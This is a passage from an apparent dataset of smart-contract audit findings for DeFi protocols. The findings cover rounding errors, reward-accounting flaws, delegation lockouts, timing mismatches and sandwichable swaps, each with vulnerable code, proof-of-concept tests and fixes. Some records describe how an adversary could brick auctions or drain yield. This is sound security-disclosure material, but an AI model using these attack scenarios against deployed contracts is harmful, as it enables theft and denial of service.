TokenStorageV1 is TokenTypesV1 {\\n /// @notice The token settings\\n Settings internal settings;\\n\\n /// @notice The vesting details of a founder\\n /// @dev Founder id => Founder\\n mapping(uint256 => Founder) internal founder;\\n\\n /// @notice The recipient of a token\\n /// @dev ERC// Remove the line below\\n721 token id => Founder\\n// Remove the line below\\n mapping(uint256 => Founder) internal tokenRecipient;\\n// Add the line below\\n mapping(uint256 => Founder) public tokenRecipient;\\n}\\n```\\n\\nadd to `token.t.sol`\\n```\\n function test_lossFirst(address _minter, uint256 _reservedUntilTokenId, uint256 _tokenId) public {\\n deployAltMock(200);\\n (address wallet ,,)= token.tokenRecipient(200);\\n assertEq(wallet,founder);\\n }\\n```\\n\\n```\\n$ forge test -vvv --match-test test_lossFirst\\n\\nRunning 1 test for test/Token.t.sol:TokenTest\\n[PASS] test_lossFirst(address,uint256,uint256) (runs: 256, μ: 3221578, ~: 3221578)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 355.45ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n","A better is that the baseTokenId always starts from 0.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId =0;\\n```\\n\\nor\\nuse `uint256 baseTokenId = reservedUntilTokenId % 100;`\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId = reservedUntilTokenId % 100;\\n```\\n",when reservedUntilTokenId > 100 first funder loss 1% NFT,"```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n" +Adversary can permanently brick auctions due to precision error in Auction#_computeTotalRewards,high,"When batch depositing to ProtocolRewards, the msg.value is expected to match the sum of the amounts array EXACTLY. The issue is that due to precision loss in Auction#_computeTotalRewards this call can be engineered to always revert which completely bricks the auction process.\\nProtocolRewards.sol#L55-L65\\n```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n\\nWhen making a batch deposit the above method is called. As seen, the call with revert if the sum of amounts does not EXACTLY equal the msg.value.\\nAuction.sol#L474-L507\\n```\\n uint256 totalBPS = _founderRewardBps + referralRewardsBPS + builderRewardsBPS;\\n\\n // rest of code\\n\\n // Calulate total rewards\\n split.totalRewards = (_finalBidAmount * totalBPS) / BPS_PER_100_PERCENT;\\n\\n // rest of code\\n\\n // Initialize arrays\\n split.recipients = new address[](arraySize);\\n split.amounts = new uint256[](arraySize);\\n split.reasons = new bytes4[](arraySize);\\n\\n // Set builder reward\\n split.recipients[0] = builderRecipient;\\n split.amounts[0] = (_finalBidAmount * builderRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set referral reward\\n split.recipients[1] = _currentBidRefferal != address(0) ? _currentBidRefferal : builderRecipient;\\n split.amounts[1] = (_finalBidAmount * referralRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set founder reward if enabled\\n if (hasFounderReward) {\\n split.recipients[2] = founderReward.recipient;\\n split.amounts[2] = (_finalBidAmount * _founderRewardBps) / BPS_PER_100_PERCENT;\\n }\\n```\\n\\nThe sum of the percentages are used to determine the totalRewards. Meanwhile, the amounts are determined using the broken out percentages of each. This leads to unequal precision loss, which can cause totalRewards to be off by a single wei which cause the batch deposit to revert and the auction to be bricked. Take the following example:\\nAssume a referral reward of 5% (500) and a builder reward of 5% (500) for a total of 10% (1000). To brick the contract the adversary can engineer their bid with specific final digits. In this example, take a bid ending in 19.\\n```\\nsplit.totalRewards = (19 * 1,000) / 100,000 = 190,000 / 100,000 = 1\\n\\nsplit.amounts[0] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\nsplit.amounts[1] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\n```\\n\\nHere we can see that the sum of amounts is not equal to totalRewards and the batch deposit will revert.\\nAuction.sol#L270-L273\\n```\\nif (split.totalRewards != 0) {\\n // Deposit rewards\\n rewardsManager.depositBatch{ value: split.totalRewards }(split.recipients, split.amounts, split.reasons, """");\\n}\\n```\\n\\nThe depositBatch call is placed in the very important _settleAuction function. This results in auctions that are permanently broken and can never be settled.","Instead of setting totalRewards with the sum of the percentages, increment it by each fee calculated. This way they will always match no matter what.",Auctions are completely bricked,```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n +"Lowering the gauge weight can disrupt accounting, potentially leading to both excessive fund distribution and a loss of funds.",high,"Similar issues were found by users 0xDetermination and bart1e in the Canto veRWA audit, which uses a similar gauge controller type.\\nWhen the _change_gauge_weight function is called, the `points_weight[addr][next_time].bias` andtime_weight[addr] are updated - the slope is not.\\n```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n\\nThe equation f(t) = c - mx represents the gauge's decay equation before the weight is reduced. In this equation, `m` is the slope. After the weight is reduced by an amount `k` using the `change_gauge_weight` function, the equation becomes f(t) = c - `k` - mx The slope `m` remains unchanged, but the t-axis intercept changes from t1 = c/m to t2 = (c-k)/m.\\nSlope adjustments that should be applied to the global slope when decay reaches 0 are stored in the `changes_sum` hashmap. And is not affected by changes in gauge weight. Consequently, there's a time window t1 - t2 during which the earlier slope changes applied to the global state when user called `vote_for_gauge_weights` function remains applied even though they should have been subtracted. This in turn creates a situation in which the global weightis less than the sum of the individual gauge weights, resulting in an accounting error.\\nSo, in the `CvgRewards` contract when the `writeStakingRewards` function invokes the `_checkpoint`, which subsequently triggers the `gauge_relative_weight_writes` function for the relevant time period, the calculated relative weight becomes inflated, leading to an increase in the distributed rewards. If all available rewards are distributed before the entire array is processed, the remaining users will receive no rewards.""\\nThe issue mainly arises when a gauge's weight has completely diminished to zero. This is certain to happen if a gauge with a non-zero bias, non-zero slope, and a t-intercept exceeding the current time is killed using `kill_gauge` function.\\nAdditionally, decreasing a gauge's weight introduces inaccuracies in its decay equation, as is evident in the t-intercept.","Disable weight reduction, or only allow reset to 0.","The way rewards are calculated is broken, leading to an uneven distribution of rewards, with some users receiving too much and others receiving nothing.","```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n" +Tokens that are both bribes and StakeDao gauge rewards will cause loss of funds,high,"When SdtStakingPositionService is pulling rewards and bribes from buffer, the buffer will return a list of tokens and amounts owed. This list is used to set the rewards eligible for distribution. Since this list is never check for duplicate tokens, a shared bribe and reward token would cause the token to show up twice in the list. The issue it that _sdtRewardsByCycle is set and not incremented which will cause the second occurrence of the token to overwrite the first and break accounting. The amount of token received from the gauge reward that is overwritten will be lost forever.\\nIn L559 of SdtStakingPositionService it receives a list of tokens and amount from the buffer.\\nSdtBuffer.sol#L90-L168\\n```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n\\nSdtBuffer#pullRewards returns a list of tokens that is a concatenated array of all bribe and reward tokens. There is not controls in place to remove duplicates from this list of tokens. This means that tokens that are both bribes and rewards will be duplicated in the list.\\nSdtStakingPositionService.sol#L561-L577\\n```\\n for (uint256 i; i < _rewardAssets.length; ) {\\n IERC20 _token = _rewardAssets[i].token;\\n uint256 erc20Id = _tokenToId[_token];\\n if (erc20Id == 0) {\\n uint256 _numberOfSdtRewards = ++numberOfSdtRewards;\\n _tokenToId[_token] = _numberOfSdtRewards;\\n erc20Id = _numberOfSdtRewards;\\n }\\n\\n **@audit overwrites and doesn't increment causing duplicates to be lost** \\n\\n _sdtRewardsByCycle[_cvgStakingCycle][erc20Id] = ICommonStruct.TokenAmount({\\n token: _token,\\n amount: _rewardAssets[i].amount\\n });\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nWhen storing this list of rewards, it overwrites _sdtRewardsByCycle with the values from the returned array. This is where the problem arises because duplicates will cause the second entry to overwrite the first entry. Since the first instance is overwritten, all funds in the first occurrence will be lost permanently.",Either sdtBuffer or SdtStakingPositionService should be updated to combine duplicate token entries and prevent overwriting.,Tokens that are both bribes and rewards will be cause tokens to be lost forever,"```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n" +Delegation Limitation in Voting Power Management,medium,"MgCVG Voting power delegation system is constrained by 2 hard limits, first on the number of tokens delegated to one user (maxTokenIdsDelegated = 25) and second on the number of delegatees for one token ( maxMgDelegatees = 5). Once this limit is reached for a token, the token owner cannot modify the delegation percentage to an existing delegated user. This inflexibility can prevent efficient and dynamic management of delegated voting power.\\nObserve these lines :\\n```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, ""INVALID_PERCENTAGE"");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, ""TOO_MUCH_DELEGATEES"");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, ""TOO_MUCH_MG_TOKEN_ID_DELEGATED"");\\n```\\n\\nif either `maxMgDelegatees` or `maxTokenIdsDelegated` are reached, delegation is no longer possible. The problem is the fact that this function can be either used to delegate or to update percentage of delegation or also to remove a delegation but in cases where we already delegated to a maximum of users (maxMgDelegatees) OR the user to who we delegated has reached the maximum number of tokens that can be delegated to him/her (maxTokenIdsDelegated), an update or a removal of delegation is no longer possible.\\n6 scenarios are possible :\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and choose to delegate 10% to him. Bob gets 2 other people delegating their tokens to him, Alice wants to increase the power delegated to Bob to 50% but she cannot due to Bob reaching `maxTokenIdsDelegated`\\n`maxTokenIdsDelegated` is set to 25, Alice is the 10th to delegate her voting power to Bob and choose to delegate 10%, DAO decrease `maxTokenIdsDelegated` to 3, Alice wants to increase the power delegated to Bob to 50%, but she cannot due to this\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and choose to delegate 90%. Bob gets 2 other people delegating their tokens to him, Alice wants to only remove the power delegated to Bob using this function, but she cannot due to this\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice reaches `maxMgDelegatees` and she cannot update her voting power for any of Bob,Charly or Donald\\n`maxMgDelegatees` is set to 5, Alice delegates her voting power to Bob,Charly and Donald by 20% each,DAO decreasesmaxMgDelegatees to 3. Alice cannot update or remove her voting power delegated to any of Bob,Charly and Donald\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice wants to only remove her delegation to Bob but she reached `maxMgDelegatees` so she cannot only remove her delegation to Bob\\nA function is provided to remove all user to who we delegated but this function cannot be used as a solution to this problem due to 2 things :\\nIt's clearly not intended to do an update of voting power percentage by first removing all delegation we did because `delegateMgCvg()` is clearly defined to allow to delegate OR to remove one delegation OR to update percentage of delegation but in some cases it's impossible which is not acceptable\\nif Alice wants to update it's percentage delegated to Bob , she would have to remove all her delegatees and would take the risk that someone is faster than her and delegate to Bob before her, making Bob reaches `maxTokenIdsDelegated` and would render impossible for Alice to re-delegate to Bob\\nPOC\\nYou can add it to test/ut/delegation/balance-delegation.spec.ts :\\n```\\nit(""maxTokenIdsDelegated is reached => Cannot update percentage of delegate"", async function () {\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n \\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(""TOO_MUCH_MG_TOKEN_ID_DELEGATED"");\\n });\\n it(""maxTokenIdsDelegated IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE"", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3); \\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(""TOO_MUCH_MG_TOKEN_ID_DELEGATED"");\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n });\\n it(""maxMgDelegatees : TRY TO UPDATE PERCENTAGE DELEGATED TO A USER IF WE ALREADY REACH maxMgDelegatees"", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(3);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 30);\\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(""TOO_MUCH_DELEGATEES"");\\n });\\n it(""maxMgDelegatees : maxMgDelegatees IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE"", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(5);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(5);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 10);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(2);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(2);\\n\\n const txFail2 = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 50);\\n await expect(txFail2).to.be.revertedWith(""TOO_MUCH_DELEGATEES"");\\n });\\n```\\n",Issue Delegation Limitation in Voting Power Management\\nSeparate functions for new delegations and updates : Implement logic that differentiates between adding a new delegatee and updating an existing delegation to allow updates to existing delegations even if the maximum number of delegatees is reached,"In some cases it is impossible to update percentage delegated or to remove only one delegated percentage then forcing users to remove all their voting power delegatations, taking the risk that someone is faster then them to delegate to their old delegated users and reach threshold for delegation, making impossible for them to re-delegate","```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, ""INVALID_PERCENTAGE"");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, ""TOO_MUCH_DELEGATEES"");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, ""TOO_MUCH_MG_TOKEN_ID_DELEGATED"");\\n```\\n" +cvgControlTower and veCVG lock timing will be different and lead to yield loss scenarios,medium,"When creating a locked CVG position, there are two more or less independent locks that are created. The first is in lockingPositionService and the other is in veCVG. LockingPositionService operates on cycles (which are not finite length) while veCVG always rounds down to the absolute nearest week. The disparity between these two accounting mechanism leads to conflicting scenario that the lock on LockingPositionService can be expired while the lock on veCVG isn't (and vice versa). Additionally tokens with expired locks on LockingPositionService cannot be extended. The result is that the token is expired but can't be withdrawn. The result of this is that the expired token must wait to be unstaked and then restaked, cause loss of user yield and voting power while the token is DOS'd.\\nCycles operate using block.timestamp when setting lastUpdateTime on the new cycle in L345. It also requires that at least 7 days has passed since this update to roll the cycle forward in L205. The result is that the cycle can never be exactly 7 days long and the start/end of the cycle will constantly fluctuate.\\nMeanwhile when veCVG is calculating the unlock time it uses the week rounded down as shown in L328.\\nWe can demonstrate with an example:\\nAssume the first CVG cycle is started at block.timestamp == 1,000,000. This means our first cycle ends at 1,604,800. A user deposits for a single cycle at 1,400,000. A lock is created for cycle 2 which will unlock at 2,209,600.\\nThe lock on veCVG does not match this though. Instead it's calculation will yield:\\n```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n\\nAs seen these are mismatched and the token won't be withdrawable until much after it should be due to the check in veCVG L404.\\nThis DOS will prevent the expired lock from being unstaked and restaked which causes loss of yield.\\nThe opposite issue can also occur. For each cycle that is slightly longer than expected the veCVG lock will become further and further behind the cycle lock on lockingPositionService. This can also cause a dos and yield loss because it could prevent user from extending valid locks due to the checks in L367 of veCVG.\\nAn example of this:\\nAssume a user locks for 96 weeks (58,060,800). Over the course of that year, it takes an average of 2 hours between the end of each cycle and when the cycle is rolled over. This effectively extends our cycle time from 604,800 to 612,000 (+7200). Now after 95 cycles, the user attempts to increase their lock duration. veCVG and lockingPositionService will now be completely out of sync:\\nAfter 95 cycles the current time would be:\\n```\\n612,000 * 95 = 58,140,000\\n```\\n\\nWhereas veCVG lock ended:\\n```\\n612,000 * 96 = 58,060,800\\n```\\n\\nAccording to veCVG the position was unlocked at 58,060,800 and therefore increasing the lock time will revert due to L367\\nThe result is another DOS that will cause the user loss of yield. During this time the user would also be excluded from taking place in any votes since their veCVG lock is expired.","I would recommend against using block.timestamp for CVG cycles, instead using an absolute measurement like veCVG uses.",Unlock DOS that cause loss of yield to the user,"```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n" +SdtRewardReceiver#_withdrawRewards has incorrect slippage protection and withdraws can be sandwiched,medium,"The _min_dy parameter of poolCvgSDT.exchange is set via the poolCvgSDT.get_dy method. The problem with this is that get_dy is a relative output that is executed at runtime. This means that no matter the state of the pool, this slippage check will never work.\\nSdtRewardReceiver.sol#L229-L236\\n```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n\\nWhen swapping from SDT to cvgSDT, get_dy is used to set _min_dy inside exchange. The issue is that get_dy is the CURRENT amount that would be received when swapping as shown below:\\n```\\n@view\\n@external\\ndef get_dy(i: int128, j: int128, dx: uint256) -> uint256:\\n """"""\\n @notice Calculate the current output dy given input dx\\n @dev Index values can be found via the `coins` public getter method\\n @param i Index value for the coin to send\\n @param j Index valie of the coin to recieve\\n @param dx Amount of `i` being exchanged\\n @return Amount of `j` predicted\\n """"""\\n rates: uint256[N_COINS] = self.rate_multipliers\\n xp: uint256[N_COINS] = self._xp_mem(rates, self.balances)\\n\\n x: uint256 = xp[i] + (dx * rates[i] / PRECISION)\\n y: uint256 = self.get_y(i, j, x, xp, 0, 0)\\n dy: uint256 = xp[j] - y - 1\\n fee: uint256 = self.fee * dy / FEE_DENOMINATOR\\n return (dy - fee) * PRECISION / rates[j]\\n```\\n\\nThe return value is EXACTLY the result of a regular swap, which is where the problem is. There is no way that the exchange call can ever revert. Assume the user is swapping because the current exchange ratio is 1:1.5. Now assume their withdraw is sandwich attacked. The ratio is change to 1:0.5 which is much lower than expected. When get_dy is called it will simulate the swap and return a ratio of 1:0.5. This in turn doesn't protect the user at all and their swap will execute at the poor price.",Allow the user to set _min_dy directly so they can guarantee they get the amount they want,SDT rewards will be sandwiched and can lose the entire balance,"```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n" +Division difference can result in a revert when claiming treasury yield and excess rewards to some users,medium,"Different ordering of calculations are used to compute `ysTotal` in different situations. This causes the totalShares tracked to be less than the claimable amount of shares\\n`ysTotal` is calculated differently when adding to `totalSuppliesTracking` and when computing `balanceOfYsCvgAt`. When adding to `totalSuppliesTracking`, the calculation of `ysTotal` is as follows:\\n```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n\\nIn `balanceOfYsCvgAt`, `ysTotal` is calculated as follows\\n```\\n uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n\\nThis difference allows the `balanceOfYsCvgAt` to be greater than what is added to `totalSuppliesTracking`\\nPOC\\n```\\n startCycle 357\\n endCycle 420\\n lockDuration 63\\n amount 2\\n ysPercentage 80\\n```\\n\\nCalculation in `totalSuppliesTracking` gives:\\n```\\n uint256 cvgLockAmount = (2 * 80) / 100; == 1\\n uint256 ysTotal = (63 * 1) / 96; == 0\\n```\\n\\nCalculation in `balanceOfYsCvgAt` gives:\\n```\\n uint256 ysTotal = ((63 * 2 * 80) / 100) / 96; == 10080 / 100 / 96 == 1\\n```\\n\\nExample Scenario\\nAlice, Bob and Jake locks cvg for 1 TDE and obtains rounded up `balanceOfYsCvgAt`. A user who is aware of this issue can exploit this issue further by using `increaseLockAmount` with small amount values by which the total difference difference b/w the user's calculated `balanceOfYsCvgAt` and the accounted amount in `totalSuppliesTracking` can be increased. Bob and Jake claims the reward at the end of reward cycle. When Alice attempts to claim rewards, it reverts since there is not enough reward to be sent.",Perform the same calculation in both places\\n```\\n+++ uint256 _ysTotal = (_extension.endCycle - _extension.cycleId)* ((_extension.cvgLocked * _lockingPosition.ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n--- uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n,This breaks the shares accounting of the treasury rewards. Some user's will get more than the actual intended rewards while the last withdrawals will result in a revert,```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n +Different spot prices used during the comparison,high,"The spot prices used during the comparison are different, which might result in the trade proceeding even if the pool is manipulated, leading to a loss of assets.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nLine 91 above calls the `SPOT_PRICE.getComposableSpotPrices` function to fetch the spot prices. Within the function, it relies on the `StableMath._calcSpotPrice` function to compute the spot price. Per the comments of this function, `spot price of token Y in token X` and `spot price Y/X` means that the Y (base) / X (quote). Thus, secondary (base) / primary (quote).\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nThe above spot price will be 